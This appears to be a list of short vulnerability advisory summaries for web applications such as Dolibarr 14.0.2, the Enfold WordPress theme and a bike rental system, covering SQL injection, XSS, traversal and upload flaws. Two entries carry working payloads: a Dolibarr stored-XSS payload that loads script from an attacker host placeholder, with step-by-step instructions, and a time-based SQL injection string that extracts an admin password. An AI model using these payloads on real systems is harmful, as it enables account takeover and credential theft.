An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers with access to the username and md5 hash of any administrators. The vulnerable file is /online-course-registration/Online/pincode-verification.php. The exploit is written in Python 3 and tested on Windows 10 + XAMPP.
Through SQL injection to bypass the login form it is possible to upload a malicious file and after use that malicious file to execute code in the remote system.
The web server allows for directory traversal and reading of arbitrary files on the system, given that the account running the server can access the target file.
When a user or admin creates a ticket, an attacker can inject javascript code into the ticket by sending a POST request to the create-ticket.php page with a malicious script in the description parameter.
Dolibarr ERP & CRM v14.0.2 suffers from a stored XSS vulnerability in the ticket creation flow that allows a low level user (with full access to the Tickets module) to achieve full permissions. For this attack vector to work, an administrator user needs to copy the text in the 'message' box. Instructions: 1. Insert this payload in the message box when creating a ticket: '><span onbeforecopy='let pwned = document.createElement('script'); pwned.setAttribute('src', 'http://YOURIPGOESHERE/hax.js'); document.body.appendChild(pwned);' contenteditable>test</span> 2. Host this file (Change the extension of the file to js and remove comments) in a remote http location of your preference. NOTE: The user id in /dolibarr/htdocs/user/perms.php?id=2 may vary depending on the installation so you might have to change this. In my case, I had only 2 users, user 2 being the low level user. 3.Once an administrator user copies the text within the ticket the attack will launch.
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Overwrite the persistent database, resulting in password reset on reboot. The exploit is done by sending a PUT request to the vulnerable endpoint with a JSON payload containing the new password.
Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials. An example payload is 'test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL; and an example execution is python3 sqliExploit.py http://localhost/bike_rental/
During a penetration test, a reflected cross-site scripting vulnerability (XSS) was found in the myfactory.FMS login form. If a user opens an attacker-prepared link to the application, attackers can run arbitrary JavaScript code in the user's browser.
While navigating on WordPress sites with Enfold Theme previous than 4.8.4 version and Avia Page Builder, string “ProofOfConcept” can be reflected literally on pagination numbers. Moreover, the parameter “avia-element-paging” appears and can be used for crafting Google Dork based searches. Changing the “ProofOfConcept” text with a Cross-Site-Scripting (XSS) payload, the page processes and executes it. This is a reflected Cross-Site-Scripting (XSS) vulnerability.